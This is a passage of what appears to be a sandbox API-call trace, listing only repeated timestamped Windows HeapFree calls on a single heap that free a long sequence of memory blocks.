[0192.571] HeapFree (in: hHeap=0x570000, dwFlags=0x0, lpMem=0x2335390 | out: hHeap=0x570000) returned 1 [0192.571] HeapFree (in: hHeap=0x570000, dwFlags=0x0, lpMem=0x23485a0 | out: hHeap=0x570000) returned 1 [0192.571] HeapFree (in: hHeap=0x570000, dwFlags=0x0, lpMem=0x235b7b0 | out: hHeap=0x570000) returned 1 [0192.571] HeapFree (in: hHeap=0x570000, dwFlags=0x0, lpMem=0x236e9c0 | out: hHeap=0x570000) returned 1 [0192.571] HeapFree (in: hHeap=0x570000, dwFlags=0x0, lpMem=0x2381bd0 | out: hHeap=0x570000) returned 1 [0192.571] HeapFree (in: hHeap=0x570000, dwFlags=0x0, lpMem=0x2394de0 | out: hHeap=0x570000) returned 1 [0192.571] HeapFree (in: hHeap=0x570000, dwFlags=0x0, lpMem=0x23a7ff0 | out: hHeap=0x570000) returned 1 [0192.576] HeapFree (in: hHeap=0x570000, dwFlags=0x0, lpMem=0x23bb200 | out: hHeap=0x570000) returned 1 [0192.578] HeapFree (in: hHeap=0x570000, dwFlags=0x0, lpMem=0x23ce410 | out: hHeap=0x570000) returned 1 [0192.578] HeapFree (in: hHeap=0x570000, dwFlags=0x0, lpMem=0x23e1620 | out: hHeap=0x570000) returned 1 [0192.578] HeapFree (in: hHeap=0x570000, dwFlags=0x0, lpMem=0x23f4830 | out: hHeap=0x570000) returned 1 [0192.582] HeapFree (in: hHeap=0x570000, dwFlags=0x0, lpMem=0x2407a40 | out: hHeap=0x570000) returned 1 [0192.582] HeapFree (in: hHeap=0x570000, dwFlags=0x0, lpMem=0x241ac50 | out: hHeap=0x570000) returned 1 [0192.582] HeapFree (in: hHeap=0x570000, dwFlags=0x0, lpMem=0x242de60 | out: hHeap=0x570000) returned 1 [0192.582] HeapFree (in: hHeap=0x570000, dwFlags=0x0, lpMem=0x2441070 | out: hHeap=0x570000) returned 1 [0192.582] HeapFree (in: hHeap=0x570000, dwFlags=0x0, lpMem=0x2454280 | out: hHeap=0x570000) returned 1 [0192.582] HeapFree (in: hHeap=0x570000, dwFlags=0x0, lpMem=0x2467490 | out: hHeap=0x570000) returned 1 [0192.582] HeapFree (in: hHeap=0x570000, dwFlags=0x0, lpMem=0x247a6a0 | out: hHeap=0x570000) returned 1 [0192.582] HeapFree (in: hHeap=0x570000, dwFlags=0x0, lpMem=0x248d8b0 | out: hHeap=0x570000) returned 1 [0192.582] HeapFree (in: hHeap=0x570000, dwFlags=0x0, lpMem=0x24a0ac0 | out: hHeap=0x570000) returned 1 [0192.582] HeapFree (in: hHeap=0x570000, dwFlags=0x0, lpMem=0x24b3cd0 | out: hHeap=0x570000) returned 1 [0192.582] HeapFree (in: hHeap=0x570000, dwFlags=0x0, lpMem=0x24c6ee0 | out: hHeap=0x570000) returned 1 [0192.582] HeapFree (in: hHeap=0x570000, dwFlags=0x0, lpMem=0x24da0f0 | out: hHeap=0x570000) returned 1 [0192.583] HeapFree (in: hHeap=0x570000, dwFlags=0x0, lpMem=0x24ed300 | out: hHeap=0x570000) returned 1 [0192.583] HeapFree (in: hHeap=0x570000, dwFlags=0x0, lpMem=0x2500510 | out: hHeap=0x570000) returned 1 [0192.589] HeapFree (in: hHeap=0x570000, dwFlags=0x0, lpMem=0x2513720 | out: hHeap=0x570000) returned 1 [0192.589] HeapFree (in: hHeap=0x570000, dwFlags=0x0, lpMem=0x2526930 | out: hHeap=0x570000) returned 1 [0192.590] HeapFree (in: hHeap=0x570000, dwFlags=0x0, lpMem=0x2539b40 | out: hHeap=0x570000) returned 1 [0192.590] HeapFree (in: hHeap=0x570000, dwFlags=0x0, lpMem=0x254cd50 | out: hHeap=0x570000) returned 1 [0192.590] HeapFree (in: hHeap=0x570000, dwFlags=0x0, lpMem=0x255ff60 | out: hHeap=0x570000) returned 1 [0192.590] HeapFree (in: hHeap=0x570000, dwFlags=0x0, lpMem=0x2573170 | out: hHeap=0x570000) returned 1 [0192.591] HeapFree (in: hHeap=0x570000, dwFlags=0x0, lpMem=0x2586380 | out: hHeap=0x570000) returned 1 [0192.591] HeapFree (in: hHeap=0x570000, dwFlags=0x0, lpMem=0x2599590 | out: hHeap=0x570000) returned 1 [0192.591] HeapFree (in: hHeap=0x570000, dwFlags=0x0, lpMem=0x25ac7a0 | out: hHeap=0x570000) returned 1 [0192.591] HeapFree (in: hHeap=0x570000, dwFlags=0x0, lpMem=0x25bf9b0 | out: hHeap=0x570000) returned 1 [0192.591] HeapFree (in: hHeap=0x570000, dwFlags=0x0, lpMem=0x25d2bc0 | out: hHeap=0x570000) returned 1 [0192.591] HeapFree (in: hHeap=0x570000, dwFlags=0x0, lpMem=0x25f0080 | out: hHeap=0x570000) returned 1 [0192.591] HeapFree (in: hHeap=0x570000, dwFlags=0x0, lpMem=0x2603290 | out: hHeap=0x570000) returned 1 [0192.591] HeapFree (in: hHeap=0x570000, dwFlags=0x0, lpMem=0x26164a0 | out: hHeap=0x570000) returned 1 [0192.591] HeapFree (in: hHeap=0x570000, dwFlags=0x0, lpMem=0x26296b0 | out: hHeap=0x570000) returned 1 [0192.591] HeapFree (in: hHeap=0x570000, dwFlags=0x0, lpMem=0x263c8c0 | out: hHeap=0x570000) returned 1 [0192.591] HeapFree (in: hHeap=0x570000, dwFlags=0x0, lpMem=0x264fad0 | out: hHeap=0x570000) returned 1 [0192.591] HeapFree (in: hHeap=0x570000, dwFlags=0x0, lpMem=0x2662ce0 | out: hHeap=0x570000) returned 1 [0192.591] HeapFree (in: hHeap=0x570000, dwFlags=0x0, lpMem=0x2675ef0 | out: hHeap=0x570000) returned 1 [0192.591] HeapFree (in: hHeap=0x570000, dwFlags=0x0, lpMem=0x2689100 | out: hHeap=0x570000) returned 1 [0192.591] HeapFree (in: hHeap=0x570000, dwFlags=0x0, lpMem=0x269c310 | out: hHeap=0x570000) returned 1 [0192.830] HeapFree (in: hHeap=0x570000, dwFlags=0x0, lpMem=0x26af520 | out: hHeap=0x570000) returned 1 [0192.832] HeapFree (in: hHeap=0x570000, dwFlags=0x0, lpMem=0x26c2730 | out: hHeap=0x570000) returned 1 [0192.832] HeapFree (in: hHeap=0x570000, dwFlags=0x0, lpMem=0x26d5940 | out: hHeap=0x570000) returned 1 [0192.832] HeapFree (in: hHeap=0x570000, dwFlags=0x0, lpMem=0x26e8b50 | out: hHeap=0x570000) returned 1 [0192.837] HeapFree (in: hHeap=0x570000, dwFlags=0x0, lpMem=0x26fbd60 | out: hHeap=0x570000) returned 1 [0192.837] HeapFree (in: hHeap=0x570000, dwFlags=0x0, lpMem=0x270ef70 | out: hHeap=0x570000) returned 1 [0192.837] HeapFree (in: hHeap=0x570000, dwFlags=0x0, lpMem=0x2722180 | out: hHeap=0x570000) returned 1 [0192.837] HeapFree (in: hHeap=0x570000, dwFlags=0x0, lpMem=0x2735390 | out: hHeap=0x570000) returned 1 [0192.837] HeapFree (in: hHeap=0x570000, dwFlags=0x0, lpMem=0x27485a0 | out: hHeap=0x570000) returned 1 [0192.837] HeapFree (in: hHeap=0x570000, dwFlags=0x0, lpMem=0x275b7b0 | out: hHeap=0x570000) returned 1 [0192.837] HeapFree (in: hHeap=0x570000, dwFlags=0x0, lpMem=0x276e9c0 | out: hHeap=0x570000) returned 1 [0192.837] HeapFree (in: hHeap=0x570000, dwFlags=0x0, lpMem=0x2781bd0 | out: hHeap=0x570000) returned 1 [0192.837] HeapFree (in: hHeap=0x570000, dwFlags=0x0, lpMem=0x2794de0 | out: hHeap=0x570000) returned 1 [0192.837] HeapFree (in: hHeap=0x570000, dwFlags=0x0, lpMem=0x27a7ff0 | out: hHeap=0x570000) returned 1 [0192.837] HeapFree (in: hHeap=0x570000, dwFlags=0x0, lpMem=0x27bb200 | out: hHeap=0x570000) returned 1 [0192.837] HeapFree (in: hHeap=0x570000, dwFlags=0x0, lpMem=0x27ce410 | out: hHeap=0x570000) returned 1 [0192.837] HeapFree (in: hHeap=0x570000, dwFlags=0x0, lpMem=0x27e1620 | out: hHeap=0x570000) returned 1 [0192.837] HeapFree (in: hHeap=0x570000, dwFlags=0x0, lpMem=0x27f4830 | out: hHeap=0x570000) returned 1 [0192.845] HeapFree (in: hHeap=0x570000, dwFlags=0x0, lpMem=0x2807a40 | out: hHeap=0x570000) returned 1 [0192.845] HeapFree (in: hHeap=0x570000, dwFlags=0x0, lpMem=0x281ac50 | out: hHeap=0x570000) returned 1 [0192.846] HeapFree (in: hHeap=0x570000, dwFlags=0x0, lpMem=0x282de60 | out: hHeap=0x570000) returned 1 [0192.846] HeapFree (in: hHeap=0x570000, dwFlags=0x0, lpMem=0x2841070 | out: hHeap=0x570000) returned 1 [0192.846] HeapFree (in: hHeap=0x570000, dwFlags=0x0, lpMem=0x2854280 | out: hHeap=0x570000) returned 1 [0192.846] HeapFree (in: hHeap=0x570000, dwFlags=0x0, lpMem=0x2867490 | out: hHeap=0x570000) returned 1 [0192.846] HeapFree (in: hHeap=0x570000, dwFlags=0x0, lpMem=0x287a6a0 | out: hHeap=0x570000) returned 1 [0192.846] HeapFree (in: hHeap=0x570000, dwFlags=0x0, lpMem=0x288d8b0 | out: hHeap=0x570000) returned 1 [0192.846] HeapFree (in: hHeap=0x570000, dwFlags=0x0, lpMem=0x28a0ac0 | out: hHeap=0x570000) returned 1 [0192.846] HeapFree (in: hHeap=0x570000, dwFlags=0x0, lpMem=0x28b3cd0 | out: hHeap=0x570000) returned 1 [0192.846] HeapFree (in: hHeap=0x570000, dwFlags=0x0, lpMem=0x28c6ee0 | out: hHeap=0x570000) returned 1 [0192.846] HeapFree (in: hHeap=0x570000, dwFlags=0x0, lpMem=0x28da0f0 | out: hHeap=0x570000) returned 1 [0192.846] HeapFree (in: hHeap=0x570000, dwFlags=0x0, lpMem=0x28ed300 | out: hHeap=0x570000) returned 1 [0192.846] HeapFree (in: hHeap=0x570000, dwFlags=0x0, lpMem=0x2900510 | out: hHeap=0x570000) returned 1 [0192.852] HeapFree (in: hHeap=0x570000, dwFlags=0x0, lpMem=0x2913720 | out: hHeap=0x570000) returned 1 [0192.852] HeapFree (in: hHeap=0x570000, dwFlags=0x0, lpMem=0x2926930 | out: hHeap=0x570000) returned 1 [0192.852] HeapFree (in: hHeap=0x570000, dwFlags=0x0, lpMem=0x2939b40 | out: hHeap=0x570000) returned 1 [0192.852] HeapFree (in: hHeap=0x570000, dwFlags=0x0, lpMem=0x294cd50 | out: hHeap=0x570000) returned 1 [0192.854] HeapFree (in: hHeap=0x570000, dwFlags=0x0, lpMem=0x295ff60 | out: hHeap=0x570000) returned 1 [0192.855] HeapFree (in: hHeap=0x570000, dwFlags=0x0, lpMem=0x2973170 | out: hHeap=0x570000) returned 1 [0192.855] HeapFree (in: hHeap=0x570000, dwFlags=0x0, lpMem=0x2986380 | out: hHeap=0x570000) returned 1 [0192.855] HeapFree (in: hHeap=0x570000, dwFlags=0x0, lpMem=0x2999590 | out: hHeap=0x570000) returned 1 [0192.855] HeapFree (in: hHeap=0x570000, dwFlags=0x0, lpMem=0x29ac7a0 | out: hHeap=0x570000) returned 1 [0192.855] HeapFree (in: hHeap=0x570000, dwFlags=0x0, lpMem=0x29bf9b0 | out: hHeap=0x570000) returned 1 [0192.855] HeapFree (in: hHeap=0x570000, dwFlags=0x0, lpMem=0x29d2bc0 | out: hHeap=0x570000) returned 1 [0192.855] HeapFree (in: hHeap=0x570000, dwFlags=0x0, lpMem=0x29e5dd0 | out: hHeap=0x570000) returned 1 [0192.855] HeapFree (in: hHeap=0x570000, dwFlags=0x0, lpMem=0x29f8fe0 | out: hHeap=0x570000) returned 1 [0192.855] HeapFree (in: hHeap=0x570000, dwFlags=0x0, lpMem=0x2a0c1f0 | out: hHeap=0x570000) returned 1 [0193.065] HeapFree (in: hHeap=0x570000, dwFlags=0x0, lpMem=0x2a1f400 | out: hHeap=0x570000) returned 1 [0193.065] HeapFree (in: hHeap=0x570000, dwFlags=0x0, lpMem=0x2a32610 | out: hHeap=0x570000) returned 1 [0193.065] HeapFree (in: hHeap=0x570000, dwFlags=0x0, lpMem=0x2a45820 | out: hHeap=0x570000) returned 1 [0193.065] HeapFree (in: hHeap=0x570000, dwFlags=0x0, lpMem=0x2a58a30 | out: hHeap=0x570000) returned 1 [0193.065] HeapFree (in: hHeap=0x570000, dwFlags=0x0, lpMem=0x2a6bc40 | out: hHeap=0x570000) returned 1 [0193.068] HeapFree (in: hHeap=0x570000, dwFlags=0x0, lpMem=0x2a7ee50 | out: hHeap=0x570000) returned 1 [0193.069] HeapFree (in: hHeap=0x570000, dwFlags=0x0, lpMem=0x2a92060 | out: hHeap=0x570000) returned 1 [0193.069] HeapFree (in: hHeap=0x570000, dwFlags=0x0, lpMem=0x2aa5270 | out: hHeap=0x570000) returned 1 [0193.069] HeapFree (in: hHeap=0x570000, dwFlags=0x0, lpMem=0x2ab8480 | out: hHeap=0x570000) returned 1 [0193.069] HeapFree (in: hHeap=0x570000, dwFlags=0x0, lpMem=0x2acb690 | out: hHeap=0x570000) returned 1 [0193.069] HeapFree (in: hHeap=0x570000, dwFlags=0x0, lpMem=0x2ade8a0 | out: hHeap=0x570000) returned 1 [0193.069] HeapFree (in: hHeap=0x570000, dwFlags=0x0, lpMem=0x2af1ab0 | out: hHeap=0x570000) returned 1 [0193.069] HeapFree (in: hHeap=0x570000, dwFlags=0x0, lpMem=0x2b04cc0 | out: hHeap=0x570000) returned 1 [0193.069] HeapFree (in: hHeap=0x570000, dwFlags=0x0, lpMem=0x2b17ed0 | out: hHeap=0x570000) returned 1 [0193.074] HeapFree (in: hHeap=0x570000, dwFlags=0x0, lpMem=0x2b2b0e0 | out: hHeap=0x570000) returned 1 [0193.074] HeapFree (in: hHeap=0x570000, dwFlags=0x0, lpMem=0x2b3e2f0 | out: hHeap=0x570000) returned 1 [0193.074] HeapFree (in: hHeap=0x570000, dwFlags=0x0, lpMem=0x2b51500 | out: hHeap=0x570000) returned 1 [0193.074] HeapFree (in: hHeap=0x570000, dwFlags=0x0, lpMem=0x2b64710 | out: hHeap=0x570000) returned 1 [0193.074] HeapFree (in: hHeap=0x570000, dwFlags=0x0, lpMem=0x2b77920 | out: hHeap=0x570000) returned 1 [0193.074] HeapFree (in: hHeap=0x570000, dwFlags=0x0, lpMem=0x2b8ab30 | out: hHeap=0x570000) returned 1 [0193.077] HeapFree (in: hHeap=0x570000, dwFlags=0x0, lpMem=0x2b9dd40 | out: hHeap=0x570000) returned 1 [0193.079] HeapFree (in: hHeap=0x570000, dwFlags=0x0, lpMem=0x2bb0f50 | out: hHeap=0x570000) returned 1 [0193.079] HeapFree (in: hHeap=0x570000, dwFlags=0x0, lpMem=0x2bc4160 | out: hHeap=0x570000) returned 1 [0193.079] HeapFree (in: hHeap=0x570000, dwFlags=0x0, lpMem=0x2bd7370 | out: hHeap=0x570000) returned 1 [0193.079] HeapFree (in: hHeap=0x570000, dwFlags=0x0, lpMem=0x2bea580 | out: hHeap=0x570000) returned 1 [0193.079] HeapFree (in: hHeap=0x570000, dwFlags=0x0, lpMem=0x2bfd790 | out: hHeap=0x570000) returned 1 [0193.079] HeapFree (in: hHeap=0x570000, dwFlags=0x0, lpMem=0x2c109a0 | out: hHeap=0x570000) returned 1 [0193.079] HeapFree (in: hHeap=0x570000, dwFlags=0x0, lpMem=0x2c23bb0 | out: hHeap=0x570000) returned 1 [0193.083] HeapFree (in: hHeap=0x570000, dwFlags=0x0, lpMem=0x2c36dc0 | out: hHeap=0x570000) returned 1 [0193.083] HeapFree (in: hHeap=0x570000, dwFlags=0x0, lpMem=0x2c49fd0 | out: hHeap=0x570000) returned 1 [0193.084] HeapFree (in: hHeap=0x570000, dwFlags=0x0, lpMem=0x2c5d1e0 | out: hHeap=0x570000) returned 1 [0193.084] HeapFree (in: hHeap=0x570000, dwFlags=0x0, lpMem=0x2c703f0 | out: hHeap=0x570000) returned 1 [0193.084] HeapFree (in: hHeap=0x570000, dwFlags=0x0, lpMem=0x2c83600 | out: hHeap=0x570000) returned 1 [0193.084] HeapFree (in: hHeap=0x570000, dwFlags=0x0, lpMem=0x2c96810 | out: hHeap=0x570000) returned 1 [0193.086] HeapFree (in: hHeap=0x570000, dwFlags=0x0, lpMem=0x2ca9a20 | out: hHeap=0x570000) returned 1 [0193.088] HeapFree (in: hHeap=0x570000, dwFlags=0x0, lpMem=0x2cbcc30 | out: hHeap=0x570000) returned 1 [0193.088] HeapFree (in: hHeap=0x570000, dwFlags=0x0, lpMem=0x2ccfe40 | out: hHeap=0x570000) returned 1 [0193.088] HeapFree (in: hHeap=0x570000, dwFlags=0x0, lpMem=0x2ce3050 | out: hHeap=0x570000) returned 1 [0193.088] HeapFree (in: hHeap=0x570000, dwFlags=0x0, lpMem=0x2cf6260 | out: hHeap=0x570000) returned 1 [0193.088] HeapFree (in: hHeap=0x570000, dwFlags=0x0, lpMem=0x2d09470 | out: hHeap=0x570000) returned 1 [0193.088] HeapFree (in: hHeap=0x570000, dwFlags=0x0, lpMem=0x2d1c680 | out: hHeap=0x570000) returned 1 [0193.088] HeapFree (in: hHeap=0x570000, dwFlags=0x0, lpMem=0x2d2f890 | out: hHeap=0x570000) returned 1 [0193.092] HeapFree (in: hHeap=0x570000, dwFlags=0x0, lpMem=0x2d42aa0 | out: hHeap=0x570000) returned 1 [0193.092] HeapFree (in: hHeap=0x570000, dwFlags=0x0, lpMem=0x2d55cb0 | out: hHeap=0x570000) returned 1 [0193.092] HeapFree (in: hHeap=0x570000, dwFlags=0x0, lpMem=0x2d68ec0 | out: hHeap=0x570000) returned 1 [0193.092] HeapFree (in: hHeap=0x570000, dwFlags=0x0, lpMem=0x2d7c0d0 | out: hHeap=0x570000) returned 1 [0193.092] HeapFree (in: hHeap=0x570000, dwFlags=0x0, lpMem=0x2d8f2e0 | out: hHeap=0x570000) returned 1 [0193.094] HeapFree (in: hHeap=0x570000, dwFlags=0x0, lpMem=0x2da24f0 | out: hHeap=0x570000) returned 1 [0193.095] HeapFree (in: hHeap=0x570000, dwFlags=0x0, lpMem=0x2db5700 | out: hHeap=0x570000) returned 1 [0193.095] HeapFree (in: hHeap=0x570000, dwFlags=0x0, lpMem=0x2dc8910 | out: hHeap=0x570000) returned 1 [0193.095] HeapFree (in: hHeap=0x570000, dwFlags=0x0, lpMem=0x2df0080 | out: hHeap=0x570000) returned 1 [0193.096] HeapFree (in: hHeap=0x570000, dwFlags=0x0, lpMem=0x2e03290 | out: hHeap=0x570000) returned 1 [0193.096] HeapFree (in: hHeap=0x570000, dwFlags=0x0, lpMem=0x2e164a0 | out: hHeap=0x570000) returned 1 [0193.096] HeapFree (in: hHeap=0x570000, dwFlags=0x0, lpMem=0x2e296b0 | out: hHeap=0x570000) returned 1 [0193.096] HeapFree (in: hHeap=0x570000, dwFlags=0x0, lpMem=0x2e3c8c0 | out: hHeap=0x570000) returned 1 [0193.096] HeapFree (in: hHeap=0x570000, dwFlags=0x0, lpMem=0x2e4fad0 | out: hHeap=0x570000) returned 1 [0193.096] HeapFree (in: hHeap=0x570000, dwFlags=0x0, lpMem=0x2e62ce0 | out: hHeap=0x570000) returned 1 [0193.096] HeapFree (in: hHeap=0x570000, dwFlags=0x0, lpMem=0x2e75ef0 | out: hHeap=0x570000) returned 1 [0193.096] HeapFree (in: hHeap=0x570000, dwFlags=0x0, lpMem=0x2e89100 | out: hHeap=0x570000) returned 1 [0193.319] HeapFree (in: hHeap=0x570000, dwFlags=0x0, lpMem=0x2e9c310 | out: hHeap=0x570000) returned 1 [0193.321] HeapFree (in: hHeap=0x570000, dwFlags=0x0, lpMem=0x2eaf520 | out: hHeap=0x570000) returned 1 [0193.321] HeapFree (in: hHeap=0x570000, dwFlags=0x0, lpMem=0x2ec2730 | out: hHeap=0x570000) returned 1 [0193.321] HeapFree (in: hHeap=0x570000, dwFlags=0x0, lpMem=0x2ed5940 | out: hHeap=0x570000) returned 1 [0193.321] HeapFree (in: hHeap=0x570000, dwFlags=0x0, lpMem=0x2ee8b50 | out: hHeap=0x570000) returned 1 [0193.326] HeapFree (in: hHeap=0x570000, dwFlags=0x0, lpMem=0x2efbd60 | out: hHeap=0x570000) returned 1 [0193.326] HeapFree (in: hHeap=0x570000, dwFlags=0x0, lpMem=0x2f0ef70 | out: hHeap=0x570000) returned 1 [0193.326] HeapFree (in: hHeap=0x570000, dwFlags=0x0, lpMem=0x2f22180 | out: hHeap=0x570000) returned 1 [0193.326] HeapFree (in: hHeap=0x570000, dwFlags=0x0, lpMem=0x2f35390 | out: hHeap=0x570000) returned 1 [0193.326] HeapFree (in: hHeap=0x570000, dwFlags=0x0, lpMem=0x2f485a0 | out: hHeap=0x570000) returned 1 [0193.326] HeapFree (in: hHeap=0x570000, dwFlags=0x0, lpMem=0x2f5b7b0 | out: hHeap=0x570000) returned 1 [0193.329] HeapFree (in: hHeap=0x570000, dwFlags=0x0, lpMem=0x2f6e9c0 | out: hHeap=0x570000) returned 1 [0193.330] HeapFree (in: hHeap=0x570000, dwFlags=0x0, lpMem=0x2f81bd0 | out: hHeap=0x570000) returned 1 [0193.330] HeapFree (in: hHeap=0x570000, dwFlags=0x0, lpMem=0x2f94de0 | out: hHeap=0x570000) returned 1 [0193.330] HeapFree (in: hHeap=0x570000, dwFlags=0x0, lpMem=0x2fa7ff0 | out: hHeap=0x570000) returned 1 [0193.330] HeapFree (in: hHeap=0x570000, dwFlags=0x0, lpMem=0x2fbb200 | out: hHeap=0x570000) returned 1 [0193.330] HeapFree (in: hHeap=0x570000, dwFlags=0x0, lpMem=0x2fce410 | out: hHeap=0x570000) returned 1 [0193.330] HeapFree (in: hHeap=0x570000, dwFlags=0x0, lpMem=0x2fe1620 | out: hHeap=0x570000) returned 1 [0193.330] HeapFree (in: hHeap=0x570000, dwFlags=0x0, lpMem=0x2ff4830 | out: hHeap=0x570000) returned 1 [0193.334] HeapFree (in: hHeap=0x570000, dwFlags=0x0, lpMem=0x3007a40 | out: hHeap=0x570000) returned 1 [0193.334] HeapFree (in: hHeap=0x570000, dwFlags=0x0, lpMem=0x301ac50 | out: hHeap=0x570000) returned 1 [0193.335] HeapFree (in: hHeap=0x570000, dwFlags=0x0, lpMem=0x302de60 | out: hHeap=0x570000) returned 1 [0193.336] HeapFree (in: hHeap=0x570000, dwFlags=0x0, lpMem=0x3041070 | out: hHeap=0x570000) returned 1 [0193.336] HeapFree (in: hHeap=0x570000, dwFlags=0x0, lpMem=0x3054280 | out: hHeap=0x570000) returned 1 [0193.336] HeapFree (in: hHeap=0x570000, dwFlags=0x0, lpMem=0x3067490 | out: hHeap=0x570000) returned 1 [0193.336] HeapFree (in: hHeap=0x570000, dwFlags=0x0, lpMem=0x307a6a0 | out: hHeap=0x570000) returned 1 [0193.336] HeapFree (in: hHeap=0x570000, dwFlags=0x0, lpMem=0x308d8b0 | out: hHeap=0x570000) returned 1 [0193.336] HeapFree (in: hHeap=0x570000, dwFlags=0x0, lpMem=0x30a0ac0 | out: hHeap=0x570000) returned 1 [0193.336] HeapFree (in: hHeap=0x570000, dwFlags=0x0, lpMem=0x30b3cd0 | out: hHeap=0x570000) returned 1 [0193.336] HeapFree (in: hHeap=0x570000, dwFlags=0x0, lpMem=0x30c6ee0 | out: hHeap=0x570000) returned 1 [0193.336] HeapFree (in: hHeap=0x570000, dwFlags=0x0, lpMem=0x30da0f0 | out: hHeap=0x570000) returned 1 [0193.342] HeapFree (in: hHeap=0x570000, dwFlags=0x0, lpMem=0x30ed300 | out: hHeap=0x570000) returned 1 [0193.345] HeapFree (in: hHeap=0x570000, dwFlags=0x0, lpMem=0x3100510 | out: hHeap=0x570000) returned 1 [0193.348] HeapFree (in: hHeap=0x570000, dwFlags=0x0, lpMem=0x3113720 | out: hHeap=0x570000) returned 1 [0193.348] HeapFree (in: hHeap=0x570000, dwFlags=0x0, lpMem=0x3126930 | out: hHeap=0x570000) returned 1 [0193.348] HeapFree (in: hHeap=0x570000, dwFlags=0x0, lpMem=0x3139b40 | out: hHeap=0x570000) returned 1 [0193.349] HeapFree (in: hHeap=0x570000, dwFlags=0x0, lpMem=0x314cd50 | out: hHeap=0x570000) returned 1 [0193.349] HeapFree (in: hHeap=0x570000, dwFlags=0x0, lpMem=0x315ff60 | out: hHeap=0x570000) returned 1 [0193.349] HeapFree (in: hHeap=0x570000, dwFlags=0x0, lpMem=0x3173170 | out: hHeap=0x570000) returned 1 [0193.349] HeapFree (in: hHeap=0x570000, dwFlags=0x0, lpMem=0x3186380 | out: hHeap=0x570000) returned 1 [0193.352] HeapFree (in: hHeap=0x570000, dwFlags=0x0, lpMem=0x3199590 | out: hHeap=0x570000) returned 1 [0193.534] HeapFree (in: hHeap=0x570000, dwFlags=0x0, lpMem=0x31ac7a0 | out: hHeap=0x570000) returned 1 [0193.534] HeapFree (in: hHeap=0x570000, dwFlags=0x0, lpMem=0x31bf9b0 | out: hHeap=0x570000) returned 1 [0193.534] HeapFree (in: hHeap=0x570000, dwFlags=0x0, lpMem=0x31d2bc0 | out: hHeap=0x570000) returned 1 [0193.534] HeapFree (in: hHeap=0x570000, dwFlags=0x0, lpMem=0x31e5dd0 | out: hHeap=0x570000) returned 1 [0193.534] HeapFree (in: hHeap=0x570000, dwFlags=0x0, lpMem=0x31f8fe0 | out: hHeap=0x570000) returned 1 [0193.534] HeapFree (in: hHeap=0x570000, dwFlags=0x0, lpMem=0x320c1f0 | out: hHeap=0x570000) returned 1 [0193.539] HeapFree (in: hHeap=0x570000, dwFlags=0x0, lpMem=0x321f400 | out: hHeap=0x570000) returned 1 [0193.539] HeapFree (in: hHeap=0x570000, dwFlags=0x0, lpMem=0x3232610 | out: hHeap=0x570000) returned 1 [0193.540] HeapFree (in: hHeap=0x570000, dwFlags=0x0, lpMem=0x3245820 | out: hHeap=0x570000) returned 1 [0193.541] HeapFree (in: hHeap=0x570000, dwFlags=0x0, lpMem=0x3258a30 | out: hHeap=0x570000) returned 1 [0193.541] HeapFree (in: hHeap=0x570000, dwFlags=0x0, lpMem=0x326bc40 | out: hHeap=0x570000) returned 1 [0193.541] HeapFree (in: hHeap=0x570000, dwFlags=0x0, lpMem=0x327ee50 | out: hHeap=0x570000) returned 1 [0193.541] HeapFree (in: hHeap=0x570000, dwFlags=0x0, lpMem=0x3292060 | out: hHeap=0x570000) returned 1 [0193.541] HeapFree (in: hHeap=0x570000, dwFlags=0x0, lpMem=0x32a5270 | out: hHeap=0x570000) returned 1 [0193.541] HeapFree (in: hHeap=0x570000, dwFlags=0x0, lpMem=0x32b8480 | out: hHeap=0x570000) returned 1 [0193.541] HeapFree (in: hHeap=0x570000, dwFlags=0x0, lpMem=0x32cb690 | out: hHeap=0x570000) returned 1 [0193.545] HeapFree (in: hHeap=0x570000, dwFlags=0x0, lpMem=0x32de8a0 | out: hHeap=0x570000) returned 1 [0193.567] HeapFree (in: hHeap=0x570000, dwFlags=0x0, lpMem=0x32f1ab0 | out: hHeap=0x570000) returned 1 [0193.567] HeapFree (in: hHeap=0x570000, dwFlags=0x0, lpMem=0x3304cc0 | out: hHeap=0x570000) returned 1 [0193.567] HeapFree (in: hHeap=0x570000, dwFlags=0x0, lpMem=0x3317ed0 | out: hHeap=0x570000) returned 1 [0193.573] HeapFree (in: hHeap=0x570000, dwFlags=0x0, lpMem=0x332b0e0 | out: hHeap=0x570000) returned 1 [0193.573] HeapFree (in: hHeap=0x570000, dwFlags=0x0, lpMem=0x333e2f0 | out: hHeap=0x570000) returned 1 [0193.573] HeapFree (in: hHeap=0x570000, dwFlags=0x0, lpMem=0x3351500 | out: hHeap=0x570000) returned 1 [0193.573] HeapFree (in: hHeap=0x570000, dwFlags=0x0, lpMem=0x3364710 | out: hHeap=0x570000) returned 1 [0193.575] HeapFree (in: hHeap=0x570000, dwFlags=0x0, lpMem=0x3377920 | out: hHeap=0x570000) returned 1 [0193.576] HeapFree (in: hHeap=0x570000, dwFlags=0x0, lpMem=0x338ab30 | out: hHeap=0x570000) returned 1 [0193.576] HeapFree (in: hHeap=0x570000, dwFlags=0x0, lpMem=0x339dd40 | out: hHeap=0x570000) returned 1 [0193.576] HeapFree (in: hHeap=0x570000, dwFlags=0x0, lpMem=0x33b0f50 | out: hHeap=0x570000) returned 1 [0193.576] HeapFree (in: hHeap=0x570000, dwFlags=0x0, lpMem=0x33c4160 | out: hHeap=0x570000) returned 1 [0193.576] HeapFree (in: hHeap=0x570000, dwFlags=0x0, lpMem=0x33d7370 | out: hHeap=0x570000) returned 1 [0193.576] HeapFree (in: hHeap=0x570000, dwFlags=0x0, lpMem=0x33ea580 | out: hHeap=0x570000) returned 1 [0193.783] HeapFree (in: hHeap=0x570000, dwFlags=0x0, lpMem=0x33fd790 | out: hHeap=0x570000) returned 1 [0193.785] HeapFree (in: hHeap=0x570000, dwFlags=0x0, lpMem=0x34109a0 | out: hHeap=0x570000) returned 1 [0193.785] HeapFree (in: hHeap=0x570000, dwFlags=0x0, lpMem=0x3423bb0 | out: hHeap=0x570000) returned 1 [0193.788] HeapFree (in: hHeap=0x570000, dwFlags=0x0, lpMem=0x3436dc0 | out: hHeap=0x570000) returned 1 [0193.788] HeapFree (in: hHeap=0x570000, dwFlags=0x0, lpMem=0x3449fd0 | out: hHeap=0x570000) returned 1 [0193.788] HeapFree (in: hHeap=0x570000, dwFlags=0x0, lpMem=0x345d1e0 | out: hHeap=0x570000) returned 1 [0193.788] HeapFree (in: hHeap=0x570000, dwFlags=0x0, lpMem=0x34703f0 | out: hHeap=0x570000) returned 1 [0193.789] HeapFree (in: hHeap=0x570000, dwFlags=0x0, lpMem=0x3483600 | out: hHeap=0x570000) returned 1 [0193.790] HeapFree (in: hHeap=0x570000, dwFlags=0x0, lpMem=0x3496810 | out: hHeap=0x570000) returned 1 [0193.790] HeapFree 